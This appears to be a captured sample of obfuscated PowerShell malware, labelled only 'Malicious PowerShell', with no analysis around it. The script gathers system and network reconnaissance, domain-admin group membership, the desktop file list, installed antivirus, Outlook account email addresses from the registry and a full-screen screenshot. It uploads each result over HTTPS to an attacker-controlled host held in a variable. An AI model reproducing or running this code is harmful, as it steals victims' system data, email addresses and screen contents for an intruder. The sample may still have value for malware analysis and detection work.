Malicious PowerShell

function PMQty([int]$Wg94, [byte[]]$V6VCS)
{
    $sdo7g = "https://$F36ui/" + [QE7K9ZJvi46.QE7K9ZJvi46]::EA2gkql9ya($Wg94, 0, $true)
    $hwv80v = [QE7K9ZJvi46.QE7K9ZJvi46]::BPizrD($V6VCS)
    (New-Object System.Net.WebClient).UploadData($sdo7g, $hwv80v)
}

function kvhLZVVHv40()
{
    if ((((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN))
    {
        $HmHCMAj1gp = "DOMAIN: NO`n`n"
    } else { $HmHCMAj1gp = "DOMAIN: YES`n`n"}
    $HmHCMAj1gp += "SYSTEMINFO:`n`n" + ((systeminfo) -join "`n")
    $HmHCMAj1gp += "`n`nIPCONFIG:`n`n" + ((ipconfig /all) -join "`n")
    $HmHCMAj1gp += "`n`nNETSTAT:`n`n" + ((netstat -f) -join "`n")
    $HmHCMAj1gp += "`n`nNETVIEW:`n`n" + ((net view) -join "`n")
    $HmHCMAj1gp += "`n`nTASKLIST:`n`n" + ((tasklist) -join "`n")
    $HmHCMAj1gp += "`n`nWHOAMI:`n`n" + ((whoami) -join "`n")
    $HmHCMAj1gp += "`n`nUSERNAME:`n`n" + ((net user $env:username /domain) -join "`n")
    $HmHCMAj1gp += "`n`nDOMAIN ADMINS:`n`n" + ((net group "domain admins" /domain ) -join "`n")
    $HmHCMAj1gp += "`n`nDESKTOP:`n`n" + (Get-ChildItem ([environment]::getfolderpath("desktop")) | Out-String)
    $HmHCMAj1gp += "`n`nAV:`n`n" + (Get-WmiObject -Namespace "root\SecurityCenter2" -Query "SELECT * FROM AntiVirusProduct").displayName
    $V6VCS = [System.Text.Encoding]::UTF8.GetBytes($HmHCMAj1gp)
    PMQty 0 $V6VCS
}

function Ux4jkLz([string] $path)
{
    $HmHCMAj1gp = ""
    try {
        $QQYrQ = (Get-ItemProperty $path | Where {$_ -match 'Account Name'})
        foreach ($m in $QQYrQ) {
            try {
                if ($m."Account Name".GetType().IsArray) {
                    $ml = [System.Text.Encoding]::Unicode.GetString($m."Account Name")
                } else {$ml = $m."Account Name"}
                if ($ml -match "@") {
                    $HmHCMAj1gp += "email: " + $ml + "`n"
                }
            } catch {}
        }
        $QQYrQ = (Get-ItemProperty $path | Where {$_ -match 'Email'})
        foreach ($m in $QQYrQ) {
            try {
                if ($m.Email.GetType().IsArray) {
                    $ml = [System.Text.Encoding]::Unicode.GetString($m.Email)
                } else {$ml = $m.Email}
                $HmHCMAj1gp += "email: " + $ml + "`n"
            } catch {}
        }
    } catch {}
    $HmHCMAj1gp
}

function vC6z()
{
    $HmHCMAj1gp = ""
    $HmHCMAj1gp += Ux4jkLz "hkcu:\Software\Microsoft\Office\16.0\Outlook\Profiles\*\9375CFF0413111d3B88A00104B2A6676\*"
    $HmHCMAj1gp += Ux4jkLz "hkcu:\Software\Microsoft\Office\15.0\Outlook\Profiles\*\9375CFF0413111d3B88A00104B2A6676\*"
    $HmHCMAj1gp += Ux4jkLz "hkcu:\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\*"
    if ($HmHCMAj1gp -ne "")
    {
        $V6VCS = [System.Text.Encoding]::UTF8.GetBytes($HmHCMAj1gp)
        PMQty 1 $V6VCS
    }
}

function cY0yMOo7U3()
{
    Add-Type -Assembly System.Windows.Forms
    $Ze8Fpb5KC = [Windows.Forms.SystemInformation]::VirtualScreen
    $Rpmv5HB = New-Object Drawing.Bitmap $Ze8Fpb5KC.Width, $Ze8Fpb5KC.Height
    $ntkkayAduow = [Drawing.Graphics]::FromImage($Rpmv5HB)
    $ntkkayAduow.CopyFromScreen($Ze8Fpb5KC.Location, [Drawing.Point]::Empty, $Ze8Fpb5KC.Size)
    $ntkkayAduow.Dispose()
    $UkzcuaUqgj = New-Object System.IO.MemoryStream
    $noFMcdA6cKj=40
    $hwv80voderParams = New-Object System.Drawing.Imaging.EncoderParameters
    $hwv80voderParams.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, $noFMcdA6cKj)
    $OmDwFp = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() | Where-Object { $_.FormatDescription -eq "JPEG" }
    $Rpmv5HB.save($UkzcuaUqgj, $OmDwFp, $hwv80voderParams)
    $Rpmv5HB.Dispose()
    $V6VCS = [convert]::ToBase64String($UkzcuaUqgj.ToArray())
    $V6VCS = [System.Text.Encoding]::ASCII.GetBytes($V6VCS)
    PMQty 2 $V6VCS
}

kvhLZVVHv40
vC6z
cY0yMOo7U3